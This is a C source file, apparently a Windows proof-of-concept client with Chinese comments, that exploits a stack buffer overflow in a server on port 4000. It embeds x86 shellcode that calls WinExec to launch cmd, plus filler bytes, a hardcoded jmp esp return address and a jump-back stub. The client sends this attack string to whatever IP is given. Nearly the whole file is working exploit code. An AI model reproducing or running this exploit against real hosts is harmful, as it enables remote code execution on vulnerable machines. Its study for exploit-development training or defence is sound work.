1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
|
//cmd下需要服务器的ip地址参数 127.0.0.1
#include <stdio.h>
#include <stdio.h>
#include <winsock.h>
#pragma comment(lib,"Ws2_32")
#define PORT 4000 /* 客户机连接远程主机的端口 */
#define MAXDATASIZE 100 /* 每次可以接收的最大字节 */
int main(int argc, char *argv[])
{
BYTE szChat[] = {
//cmd shellcode
0xfc, 0x33, 0xd2, 0xb2, 0x30, 0x64, 0xff, 0x32, 0x5a, 0x8b, 0x52, 0x0c, 0x8b, 0x52, 0x14, 0x8b,
0x72, 0x28, 0x33, 0xc9, 0xb1, 0x18, 0x33, 0xff, 0x33, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c,
0x20, 0xc1, 0xcf, 0x0d, 0x03, 0xf8, 0xe2, 0xf0, 0x81, 0xff, 0x5b, 0xbc, 0x4a, 0x6a, 0x8b, 0x5a,
0x10, 0x8b, 0x12, 0x75, 0xda, 0x8b, 0x53, 0x3c, 0x03, 0xd3, 0xff, 0x72, 0x34, 0x8b, 0x52, 0x78,
0x03, 0xd3, 0x8b, 0x72, 0x20, 0x03, 0xf3, 0x33, 0xc9, 0x41, 0xad, 0x03, 0xc3, 0x81, 0x38, 0x47,
0x65, 0x74, 0x50, 0x75, 0xf4, 0x81, 0x78, 0x04, 0x72, 0x6f, 0x63, 0x41, 0x75, 0xeb, 0x81, 0x78,
0x08, 0x64, 0x64, 0x72, 0x65, 0x75, 0xe2, 0x49, 0x8b, 0x72, 0x24, 0x03, 0xf3, 0x66, 0x8b, 0x0c,
0x4e, 0x8b, 0x72, 0x1c, 0x03, 0xf3, 0x8b, 0x14, 0x8e, 0x03, 0xd3, 0x52, 0x68, 0x78, 0x65, 0x63,
0x01, 0xfe, 0x4c, 0x24, 0x03, 0x68, 0x57, 0x69, 0x6e, 0x45, 0x54, 0x53, 0xff, 0xd2, 0x68, 0x63,
0x6d, 0x64, 0x01, 0xfe, 0x4c, 0x24, 0x03, 0x6a, 0x05, 0x33, 0xc9, 0x8d, 0x4c, 0x24, 0x04, 0x51,
0xff, 0xd0, 0x68, 0x65, 0x73, 0x73, 0x01, 0x8b, 0xdf, 0xfe, 0x4c, 0x24, 0x03, 0x68, 0x50, 0x72,
0x6f, 0x63, 0x68, 0x45, 0x78, 0x69, 0x74, 0x54, 0xff, 0x74, 0x24, 0x20, 0xff, 0x54, 0x24, 0x20,
0x57, 0xff, 0xd0,
//垃圾字节
0xB8,0xDB,0xA1,0xA3,0xCE,0xD2,0xB5,0xC4,0xD7,0xCB,0xC8,0xDD,0xB7,0xE7,0xBB,0xAA,0xBE,0xF8,0xB4,0xFA,
0xA3,0xAC,0xCE,0xD2,0xB5,0xC4,0xD0,0xA6,0xC3,0xB2,0xBF,0xF5,0xCA,0xC0,0xBE,0xF8,0xB3,0xBE,0xA1,0xA3,
0xB7,0xBA,0xD4,0xDA,0xB4,0xBD,0xBC,0xE4,0xB5,0xC4,0xC3,0xDB,0xD0,0xA6,0xA3,0xAC,0xC8,0xB4,0xD4,0xF5,
0xC3,0xB4,0xD2,0xB2,0xB2,0xBB,0xD4,0xB8,0xD2,0xE2,0xD0,0xD1,0xC0,0xB4,0xA1,0xA3,0xB6,0xE0,0xC3,0xB4,
0xD0,0xD2,0xB8,0xA3,0xB5,0xC4,0xCA,0xB1,0xBF,0xCC,0xA3,0xA1,0xCE,0xC7,0xA3,0xAC,0xCC,0xF0,0xC3,0xDB,
0xB5,0xD8,0xC7,0xE3,0xD0,0xBA,0xCF,0xC2,0xC0,0xB4,0xA3,0xBA,0xB6,0xEE,0xC9,0xCF,0xA1,0xA2,0xD1,0xDB,
0xC1,0xB1,0xA1,0xA2,0xB1,0xC7,0xBC,0xE2,0xA1,0xA2,0xC3,0xB5,0xB9,0xE5,0xB5,0xC4,0xB4,0xBD,0xA1,0xA3,
0xC4,0xC7,0xBC,0xA4,0xB6,0xAF,0xB5,0xC4,0xA1,0xA2,0xB2,0xFC,0xB6,0xB6,0xB5,0xC4,0xA1,0xA2,0xBB,0xC5,
0xC2,0xD2,0xB5,0xC4,0xA3,0xAC,0xB3,0xC9,0xB3,0xA4,0xD2,0xD4,0xC0,0xB4,0xB5,0xC4,0xC3,0xCE,0xCF,0xEB,
0xD3,0xEB,0xC5,0xCE,0xCD,0xFB,0xA3,0xAC,0xCE,0xD2,0xCA,0xD6,0xD7,0xE3,0xCE,0xDE,0xB4,0xEB,0xA3,0xA1,
0xBE,0xCD,0xD4,0xDA,0xBA,0xF4,0xCE,0xFC,0xD3,0xEB,0xB4,0xA5,0xBE,0xF5,0xC6,0xB5,0xC1,0xD9,0xBE,0xF8,
0xBE,0xB3,0xB5,0xC4,0xCA,0xB1,0xBA,0xF2,0xA3,0xAC,0xD2,0xC0,0xCF,0xA1,0xB8,0xD0,0xBE,0xF5,0xC4,0xB0,
0xC9,0xFA,0xA3,0xBA,0xCB,0xFB,0xB1,0xA6,0xCA,0xAF,0xB0,0xE3,0xB5,0xC4,0xED,0xF8,0xD7,0xD3,0xA3,0xAC,
0xC6,0xCB,0xF3,0xF9,0xC3,0xD4,0xC0,0xEB,0xB5,0xC4,0xD1,0xDB,0xC9,0xF1,0xA3,0xAC,0xBD,0xC6,0xF7,0xEF,
0xCE,0xA2,0xD1,0xEF,0xB5,0xC4,0xD7,0xEC,0xBD,0xC7,0xA3,0xAC,0xC7,0xE5,0xC7,0xB3,0xF7,0xC8,0xBB,0xF3,
0xB5,0xC4,0xD0,0xA6,0xC8,0xDD,0xA1,0xA3,0xCE,0xD2,0xB5,0xC4,0xCD,0xF5,0xD7,0xD3,0xC4,0xD8,0xA3,0xBF,
0xBB,0xCC,0xBB,0xF3,0xA1,0xA2,0xBE,0xAA,0xBA,0xF4,0xA1,0xA2,0xD5,0xF5,0xD4,0xFA,0xA1,0xAD,0xA1,0xAD,
0xD2,0xBB,0xC7,0xD0,0xC0,0xB4,0xB5,0xC3,0xC4,0xC7,0xC3,0xB4,0xCD,0xBB,0xC8,0xBB,0xA3,0xA1,0xD4,0xDA,
0xCE,0xDE,0xCA,0xFD,0xB5,0xC4,0xC3,0xCE,0xCF,0xEB,0xD6,0xD0,0xA3,0xAC,0xCE,0xD2,0xB6,0xBC,0xCA,0xC7,
0xBE,0xF8,0xC3,0xC0,0xB5,0xC4,0xD7,0xCB,0xCC,0xAC,0xA3,0xAC,0xB3,0xF6,0xCF,0xD6,0xD4,0xDA,0xB0,0xAE,
0xC7,0xE9,0xD6,0xAE,0xC7,0xB0,0xA1,0xA3,0xD5,0xE6,0xB5,0xC4,0xB2,0xBB,0xD6,0xAA,0xB5,0xC0,0xC3,0xFC,
0xD4,0xCB,0xA3,0xAC,0xCE,0xAA,0xCA,0xB2,0xC3,0xB4,0xC8,0xE7,0xB4,0xCB,0xB2,0xBB,0xBF,0xB0,0xA1,0xA3,
0xCB,0xD5,0xD0,0xD1,0xB5,0xC4,0xCA,0xB1,0xBA,0xF2,0xA3,0xAC,0xB0,0xB2,0xD4,0xDA,0xC4,0xB0,0xC9,0xFA,
0xB5,0xC4,0xBE,0xB3,0xB5,0xD8,0xA3,0xAC,0xEB,0xFC,0xEB,0xCA,0xC6,0xAE,0xB7,0xF7,0xB5,0xC4,0xC1,0xB1,
0xE1,0xA3,0xA3,0xAC,0xC3,0xD4,0xC0,0xEB,0xE4,0xD6,0xC8,0xBE,0xD7,0xC5,0xB4,0xBC,0xCF,0xE3,0xA1,0xA3,
0xB7,0xC2,0xB7,0xF0,0xD3,0xD0,0xB8,0xF6,0xC9,0xF9,0xD2,0xF4,0xBA,0xF4,0xBB,0xBD,0xD7,0xC5,0xA3,0xAC,
0xD4,0xD3,0xC2,0xD2,0xCB,0xF6,0xCB,0xE9,0xB5,0xC4,0xBD,0xC5,0xB2,0xBD,0xC9,0xF9,0xA3,0xAC,0xBB,0xCE,
0xB6,0xAF,0xCE,0xDE,0xCA,0xFD,0xBB,0xB6,0xD4,0xC3,0xB5,0xC4,0xC1,0xB3,0xA1,0xAD,0xA1,0xAD,0xB8,0xD0,
0xBE,0xF5,0xA3,0xAC,0xD2,0xC0,0xBE,0xC9,0xC8,0xE1,0xC8,0xED,0xCE,0xDE,0xC1,0xA6,0xA3,0xAC,0xC8,0xE7,
0xCD,0xAC,0xB4,0xB9,0xCB,0xC0,0xD5,0xF5,0xD4,0xFA,0xA3,0xA1,0xC4,0xB3,0xD0,0xA9,0xD6,0xAD,0xD2,0xBA,
0xD4,0xDA,0xB4,0xBD,0xBC,0xE4,0xD3,0xCE,0xB6,0xAF,0xA3,0xAC,0xCB,0xE1,0xCB,0xE1,0xCC,0xF0,0xCC,0xF0,
0xC9,0xAC,0xC9,0xAC,0xB5,0xC4,0xA3,0xAC,0xC9,0xF8,0xCD,0xB8,0xD7,0xC5,0xD7,0xED,0xC8,0xCB,0xB5,0xC4,
0xB7,0xD2,0xB7,0xBC,0xA1,0xA3,0xD2,0xE2,0xCA,0xB6,0xBB,0xBA,0xBB,0xBA,0xC7,0xE5,0xD0,0xD1,0xB9,0xFD,
0xC0,0xB4,0xC1,0xCB,0xA3,0xAC,0xB2,0xBB,0xD6,0xAA,0xCA,0xB2,0xC3,0xB4,0xCA,0xB1,0xBA,0xF2,0xB0,0xB2,
0xBE,0xB2,0xC1,0xCB,0xA3,0xAC,0xC4,0xC7,0xD0,0xA9,0xA1,0xB0,0xC1,0xB3,0xC5,0xD3,0xA1,0xB1,0xB2,0xBB,
0xBC,0xFB,0xC1,0xCB,0xA1,0xA3,0xBB,0xBB,0xB6,0xF8,0xB4,0xFA,0xD6,0xAE,0xA3,0xAC,0xCB,0xC6,0xD4,0xF8,
0xCF,0xE0,0xCA,0xB6,0xA3,0xBA,0xCB,0xFB,0xC4,0xC7,0xC0,0xF5,0xBD,0xF0,0xC9,0xAB,0xB5,0xC4,0xB7,0xA2,
0xC9,0xD2,0xA3,0xAC,0xCF,0xE2,0xC7,0xB6,0xD7,0xC5,0xE8,0xAD,0xE8,0xB2,0xB5,0xC4,0xB8,0xDF,0xD4,0xC6,
0xC9,0xD2,0xA3,0xAC,0xCF,0xE2,0xC7,0xB6,0xD7,0xC5,0xE8,0xAD,0xE8,0xB2,0xB5,0xC4,0xB8,0xDF,0xD4,0xC6,
0xC9,0xD2,0xA3,0xAC,0xCF,0xE2,0xC7,0xB6,0xD7,0xC5,0xE8,0xAD,0xE8,0xB2,0xB5,0xC4,0xB8,0xDF,0xD4,0xC6,0xC4,0xB8,0xDF,0xD4,0xC6,
//到这里填充字节结束
//下面是jmp esp 这里esp会返回到4个字节后,因为是retn 0x4
0x12,0x45,0xFA,0x7F, //栈区,retn处的4个字节
//垃圾字节 byte
0x61,0x61,0x61,0x61,
// push eax
// jmp [esp] 这俩句跳到缓冲区开头
0x50, 0xff, 0x24, 0x24,
};
//socket
int sockfd, numbytes;
char buf[MAXDATASIZE];
struct sockaddr_in their_addr; /* 对方的地址端口信息 */
if (argc != 2)
{
//需要有服务端ip参数
fprintf(stderr,"usage: client hostname\n");
exit(1);
}
WSADATA ws;
WSAStartup(MAKEWORD(2,2),&ws); //初始化Windows Socket Dll
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
//如果建立socket失败,退出程序
printf("socket error\n");
exit(1);
}
//连接对方
their_addr.sin_family = AF_INET; /* 协议类型是INET */
their_addr.sin_port = htons(PORT); /* 连接对方PORT端口 */
their_addr.sin_addr.s_addr = inet_addr(argv[1]); /* 连接对方的IP */
if (connect(sockfd, (struct sockaddr *)&their_addr,sizeof(struct sockaddr)) == -1)
{
//如果连接失败,退出程序
printf("connet error\n");
closesocket(sockfd);
exit(1);
}
send(sockfd, (PCHAR)szChat, sizeof(szChat),0); //发送攻击字符串
closesocket(sockfd);
return 0;
}
|